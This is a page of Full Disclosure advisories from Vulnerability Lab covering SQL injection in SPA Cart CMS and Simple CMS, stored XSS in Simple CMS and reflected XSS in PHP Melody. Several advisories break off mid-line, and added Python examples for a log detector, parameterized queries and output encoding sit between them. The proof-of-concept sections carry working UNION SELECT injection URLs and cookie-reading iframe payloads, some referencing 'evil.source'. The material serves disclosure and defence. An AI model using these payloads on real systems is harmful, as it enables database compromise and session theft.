-
https://simple-cms.loc
[FD] SPA Cart CMS - Multiple SQL Injection Web Vulnerabilities
Document Title:
===============
SPA Cart CMS - Multiple SQL Injection Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2304

Release Date:
=============
2021-10-18

Vulnerability Laboratory ID (VL-ID):
====================================
2304

Common Vulnerability Scoring System:
====================================
7.3

Vulnerability Class:
====================
Script Code Injection

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
SPA-Cart - Single Page Application. Fully featured eCommerce CMS platform. Very fast ajaxfied pages.

(Copy of the Homepage: https://spa-cart.com/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the SPA Cart CMS (v2021) web-application.

Affected Product(s):
====================
olegkhorev
Product: SPA Cart CMS (v2021) - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-10-01: Vendor Response/Feedback (Security Department)
2021-10-02: Vendor Fix/Patch (Service Developer Team)
2021-10-10: Security Acknowledgements (Security Department)
2021-11-18: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Full Authentication (Admin/Root Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the official SPA Cart CMS web-application.
The vulnerability allows remote attackers to inject or execute their own sql commands to compromise the dbms or file system of the application.

The remote sql injection web vulnerabilities are located in the `id`, `shippingid` and `zoneid` parameters of the `category`, `products` and `shipping_charges` modules.
Remote attackers with privileged panel access are able to inject and execute their own malicious sql commands to compromise the integrated database management system (mysql).
The request method to inject and execute is GET and the attack vector is located on the client-side. Exploitation of the sql injection vulnerability requires no user interaction and a privileged application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] category
[+] products
[+] shipping_charges

Vulnerable Parameter(s):
[+] id
[+] shippingid
[+] zoneid

Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers with a privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
http://spa-cart.localhost:8080/admin/category/[ID][SQL-INJECTION!]--
http://spa-cart.localhost:8080/admin/products?sort=[ID][SQL-INJECTION!]--&direction=0
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=[ID][SQL-INJECTION!]--
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=&zoneid=[ID][SQL-INJECTION!]--

PoC: Exploit
http://spa-cart.localhost:8080/admin/category/-1' union select all 1,2,3,4,5,6,7,8,@@verison--">
http://spa-cart.localhost:8080/admin/products?sort=-1' union select all 1,2,3,4,5,6,7,8,@@verison--">
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=-1' union select all 1,2,3,4,5,6,7,8,@@verison--">
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=&zoneid=-1' union select all 1,2,3,4,5,6,7,8,@@verison--">

--- SQL Exception Logs ---
Error: MySQL
Statement: SELECT all FROM products p GROUP BY p.productid ORDER BY p.status DESC, p.1 LIMIT 0, 50;
Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 1 LIMIT 0, 50' at line 1
-
Statement: SELECT all FROM products p GROUP BY p.productid ORDER BY p.status DESC, p.1 LIMIT 0, 50;
Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 1 LIMIT 0, 50' at line 2
-
Statement: SELECT all FROM products p GROUP BY p.productid ORDER BY p.status DESC, p.1 LIMIT 0, 50;
Exception: You have an error in your SQL syntax; check the manual that correspo
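Both the Simple CMS preview.php PoC above and the SPA Cart PoC URLs leave a recognisable trace in the web server's access log: a URL-encoded quote followed by UNION SELECT and a trailing comment marker, or an encoded `">` break-out followed by an iframe with an inline event handler. The following detector is an added example written for this page, not code from Vulnerability Lab, SPA Cart or Simple CMS. It percent-decodes every path segment and query parameter before matching (so encoding alone does not hide the probe), and the access-log lines it scans are constructed to mirror the request shapes in the advisories; the log format, rule names and field names are assumptions.

```python
"""Flag SQL-injection and XSS probes in Apache-style access logs (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines shaped like the PoC requests in the advisories.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Nov/2021:10:01:02 +0000] "GET /admin/products?sort=-1%27%20union%20select%20all%201,2,3-- HTTP/1.1" 500 412
10.0.0.5 - - [18/Nov/2021:10:01:09 +0000] "GET /admin/category/-1%27%20union%20select%20all%201,2,3-- HTTP/1.1" 500 402
10.0.0.9 - - [18/Nov/2021:10:02:30 +0000] "GET /simplecms/preview.php?id=-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E HTTP/1.1" 200 1658
10.0.0.7 - - [18/Nov/2021:10:03:00 +0000] "GET /admin/products?sort=price&direction=1 HTTP/1.1" 200 5120
10.0.0.7 - - [18/Nov/2021:10:03:05 +0000] "GET /simplecms/preview.php?id=12 HTTP/1.1" 200 2210
"""

# Apache combined-log shape: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

RULES = {
    # a quote that closes a string literal, then UNION [ALL] SELECT (the PoC shape)
    "sqli-union": re.compile(r"'\s*union\s+(?:all\s+)?select\b", re.I),
    # trailing comment marker that discards the rest of the original statement
    "sqli-comment": re.compile(r"--\s*$"),
    # attribute or tag break-out immediately followed by an element that can run script
    "xss-tag-breakout": re.compile(r"[\"'>]\s*<\s*(?:iframe|script|img|svg)\b", re.I),
    # inline event handler such as onload=
    "xss-event-handler": re.compile(r"\bon\w+\s*=", re.I),
}


def classify(value):
    """Return the sorted names of every rule the decoded value matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(value))


def candidates(target):
    """Yield (location, decoded value) for each path segment and query parameter.

    The SPA Cart category endpoint carries the value in the path, so path
    segments are inspected as well as the query string.
    """
    parts = urlsplit(target)
    for i, seg in enumerate(parts.path.split("/")):
        if seg:
            yield f"path[{i}]", unquote(seg)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        yield name, value  # parse_qsl already percent-decodes the value


def scan_log(text):
    """Return one finding per (request, parameter) that matches at least one rule."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for location, value in candidates(m["target"]):
            hits = classify(value)
            if hits:
                findings.append({
                    "line": n, "client": m["client"], "status": int(m["status"]),
                    "param": location, "value": value, "rules": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['client']} {f['param']}={f['value']!r} -> {', '.join(f['rules'])}")
```

A single `sqli-comment` hit on its own is low confidence (values that legitimately end in `--` exist), so treat the rule list per finding as the signal, and correlate with the HTTP status: the SPA Cart exceptions above surface as server errors, which is why the sample probes carry a 500.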
[FD] Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2302

Release Date:
=============
2021-10-19

Vulnerability Laboratory ID (VL-ID):
====================================
2302

Common Vulnerability Scoring System:
====================================
5.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents. Just paste a single line of code on your web page section and start controlling it through the admin area. Very simple installation - one step installation wizard. Option to include contents into web page sections through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.

Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Full Authentication (Admin/Root Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side.

The persistent cross site web vulnerability is located in the `name`, `username` and `password` parameters of the `newUser` and `editUser` modules.
Remote attackers with a privileged application user account and panel access are able to inject their own malicious script code as credentials. The injected code executes on preview of the users list.
The request method to inject is POST and the attack vector is persistent.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a privileged account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

PoC: Payload
">

Vulnerable Source: admin.php?act=users
Name      Email                        Username   Password
c">       keymaste...@protonmail.com   d">        e">

--- PoC Session Logs (POST) [Create] ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=c">&email=teste...@test.de &username=d"> &password=e">&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 5258
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/31337
Host: simple-cms.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
Cookie: PH
[FD] Simplephpscripts Simple CMS v2.1 - Remote SQL Injection Vulnerability
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - Remote SQL Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2303

Release Date:
=============
2021-10-19

Vulnerability Laboratory ID (VL-ID):
====================================
2303

Common Vulnerability Scoring System:
====================================
7.1

Vulnerability Class:
====================
SQL Injection

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents. Just paste a single line of code on your web page section and start controlling it through the admin area. Very simple installation - one step installation wizard. Option to include contents into web page sections through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.

Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the official Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject or execute their own sql commands to compromise the dbms or file system of the application.

The sql-injection web vulnerability is located in the `newUser` and `editUser` functions of the `users` module in the `admin.php` file.
Remote attackers with privileged access to the panel are able to add users. If a user account already exists, for example the admin account, each attempt to add the same name or email values results in an unfiltered mysql exception.
The exception is not filtered or sanitized. This allows privileged attackers to inject and execute their own sql commands on the affected database management system to compromise it.
The request method to inject is POST and the attack vector is non-persistent. Exploitation of the sql injection vulnerability requires user interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)

Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers with a privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.

PoC: Example
act=addUser&name=[ADD EXISTING DEFAULT VALUE!]&email=t...@test.de&username=[ADD EXISTING DEFAULT VALUE!]&password=[ADD EXISTING DEFAULT VALUE!]&submit=Add User

PoC: Exploitation
act=addUser&name=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&email=t...@test.de&username=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User

--- PoC Session Logs (POST) ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addU
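The root cause described above is twofold: the posted name, e-mail and username values reach the INSERT as part of the statement text, and the duplicate-key exception that MySQL raises is echoed back to the client unfiltered. The following is an added example for this page, not Simple CMS code, showing the defensive shape of the same `newUser` flow: placeholders bind the values as data, and the duplicate-key path returns fixed text to the client while the real error goes only to the server-side log. sqlite3 stands in for MySQL; the `users` schema, column names, password-hash format and function names are assumptions.

```python
"""Parameterized user creation with a non-leaking duplicate-key path (added example)."""
import hashlib
import hmac
import os
import sqlite3

# Assumed schema; UNIQUE constraints produce the duplicate-key error the advisory describes.
SCHEMA = """
CREATE TABLE users (
    id       INTEGER PRIMARY KEY,
    name     TEXT NOT NULL UNIQUE,
    email    TEXT NOT NULL UNIQUE,
    username TEXT NOT NULL UNIQUE,
    pwhash   TEXT NOT NULL
);
"""
SERVER_LOG = []  # stands in for the application's server-side log file


def open_db():
    """Create an in-memory database with the assumed users table."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def hash_password(password, salt=None, rounds=200_000):
    """PBKDF2-SHA256 with a random salt; credentials are never stored as entered."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${digest.hex()}"


def verify_password(stored, candidate):
    _, rounds, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)


def add_user(con, name, email, username, password):
    """Insert a user and return (ok, message).

    The message shown to the client is fixed text. The database error text,
    which the advisory's CMS echoed to the browser, is written to the server
    log only.
    """
    try:
        with con:  # commits on success, rolls back on exception
            con.execute(
                "INSERT INTO users (name, email, username, pwhash) VALUES (?, ?, ?, ?)",
                (name, email, username, hash_password(password)),
            )
    except sqlite3.IntegrityError as exc:
        SERVER_LOG.append(f"add_user rejected: {exc}")
        return False, "A user with that name, e-mail address or username already exists."
    return True, "User added."


def find_username(con, name):
    """Look a user up by display name; the quote in a name like O'Brien is plain data."""
    row = con.execute("SELECT username FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def count_users(con):
    return con.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def check_login(con, username, password):
    row = con.execute("SELECT pwhash FROM users WHERE username = ?", (username,)).fetchone()
    return bool(row) and verify_password(row[0], password)


if __name__ == "__main__":
    db = open_db()
    print(add_user(db, "Admin", "admin@example.test", "admin", "s3cret"))
    print(add_user(db, "Admin", "other@example.test", "admin2", "x"))  # duplicate name
    print(add_user(db, "O'Brien", "ob@example.test", "obrien", "pw"))
    print(SERVER_LOG)
```

The same split applies to a PHP code base using PDO or mysqli: bind the form fields, catch the driver's duplicate-key exception, and keep `$e->getMessage()` out of the response body.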
[FD] PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities
Document Title:
===============
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2290

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/

Release Date:
=============
2021-10-20

Vulnerability Laboratory ID (VL-ID):
====================================
2290

Common Vulnerability Scoring System:
====================================
5

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.

Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple non-persistent cross site web vulnerabilities have been discovered in the official PHP Melody v3.0 video cms web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise browser to web-application requests on the client-side.

The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php` and `import-user.php` files.
The injection point is located in the GET method request and the execution occurs with a non-persistent attack vector in the status message or exception of the admin panel ui.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] categories.php
[+] import-user.php
[+] import.php

Vulnerable Parameter(s):
[+] moved
[+] username
[+] keyword

Affected Module(s):
[+] Status Message & Exception

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

PoC: Payload
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E

PoC: Exploitation
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
-
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
-
https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4

PoC: Exploit
PHP Melody v3.0 - XSS PoC Exploit
#1
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200">
#2
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data
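Both the PHP Melody advisory above (a status message that reflects the `moved` GET parameter) and the Simple CMS persistent advisory earlier on this page (a users list that renders stored name and username fields) are the same defect seen from two sinks: untrusted text written into HTML without output encoding. The following is an added example for this page, not PHP Melody or Simple CMS code, contrasting an unencoded render with one that escapes for the text and attribute contexts, and checking the result with an HTML parser rather than a substring match (an escaped `onload=` is inert text, so grepping for it would report a false positive). The payload string is the one from the PHP Melody PoC; the stored user row is constructed from the `">` prefix the Simple CMS advisory shows; function names and the HTML skeleton are assumptions.

```python
"""Contextual output encoding for reflected and stored values (added example)."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

PAYLOAD = '"><iframe src=a onload=alert(document.cookie)>'  # decoded PoC payload from the advisory
# Constructed stored row: the "> prefix the Simple CMS advisory shows, followed by the payload.
USER_ROW = {"name": "c" + PAYLOAD, "email": "keymaster@example.test", "username": "d" + PAYLOAD}


def render_status_unsafe(moved):
    """The advisory's sink shape: the parameter is concatenated into the page as-is."""
    return f'<div class="status">Category moved to {moved}</div>'


def render_status(moved):
    """Text context: html.escape turns < > & " ' into entities, so no tag can start."""
    return f'<div class="status">Category moved to {html.escape(moved)}</div>'


def status_from_query(query):
    """Assumed handler: read `moved` from the query string and render it safely."""
    moved = parse_qs(query, keep_blank_values=True).get("moved", [""])[0]
    return render_status(moved)


def render_users_unsafe(rows):
    cells = "".join(
        f"<tr><td>{r['name']}</td><td>{r['email']}</td><td>{r['username']}</td></tr>" for r in rows
    )
    return f"<table>{cells}</table>"


def render_users(rows):
    """Every stored field is escaped at output time, regardless of what was accepted on input."""
    cells = "".join(
        "<tr>" + "".join(f"<td>{html.escape(r[k])}</td>" for k in ("name", "email", "username")) + "</tr>"
        for r in rows
    )
    return f"<table>{cells}</table>"


def render_edit_form(row):
    """Attribute context: html.escape(quote=True) also maps " to &quot;, so the stored
    value cannot close the value="..." attribute early and add new attributes."""
    return f'<input name="username" value="{html.escape(row["username"])}">'


class _Audit(HTMLParser):
    """Collect script-capable tags, inline event handlers and <input> values from markup."""

    def __init__(self):
        super().__init__()
        self.issues = []
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script"):
            self.issues.append(tag)
        for name, _ in attrs:
            if name.startswith("on"):
                self.issues.append(name)
        if tag == "input":
            a = dict(attrs)
            self.inputs[a.get("name")] = a.get("value")


def active_content(markup):
    """Return the list of script-capable tags and on* attributes the browser would see."""
    p = _Audit()
    p.feed(markup)
    p.close()
    return p.issues


def input_values(markup):
    """Return {input name: value} as a browser would decode the attribute values."""
    p = _Audit()
    p.feed(markup)
    p.close()
    return p.inputs


if __name__ == "__main__":
    print("unsafe status:", active_content(render_status_unsafe(PAYLOAD)))
    print("safe status:  ", active_content(render_status(PAYLOAD)))
    print("safe form:    ", render_edit_form(USER_ROW))
```

Escaping is the generic fix; for a parameter like `moved`, which only ever names a category, validating it against the set of existing category ids before rendering is the stronger control and removes the need to ever echo attacker-controlled text.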
[FD] VDPBW Bundeswehr - 1 Year Vulnerability Disclosure Policy of the Bundeswehr
Title: 1 Year Vulnerability Disclosure Policy of the Bundeswehr - The Balance Sheet of the CISOBw (Chief Information Security Officer)
Reference: https://www.bundeswehr.de/de/organisation/cyber-und-informationsraum/aktuelles/1-jahr-vdpbw-cisobw-bilanz-5232904

Title: VDPBw (Vulnerability Disclosure Policy der Bundeswehr) - COIN
Reference: https://www.bundeswehr.de/de/security-policy/vdpbw-coin

Title: Im Dienst der IT-Sicherheit (In the Service of IT Security) (Interview, 1st Rank)
Reference: https://www.bundeswehr.de/de/organisation/cyber-und-informationsraum/aktuelles/vdpbw-im-dienst-der-it-sicherheit-5233314

Title: @cirbw - https://twitter.com/cirbw
Reference: https://twitter.com/cirbw/status/1452590762307334151
https://twitter.com/cirbw/status/145254605418915

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/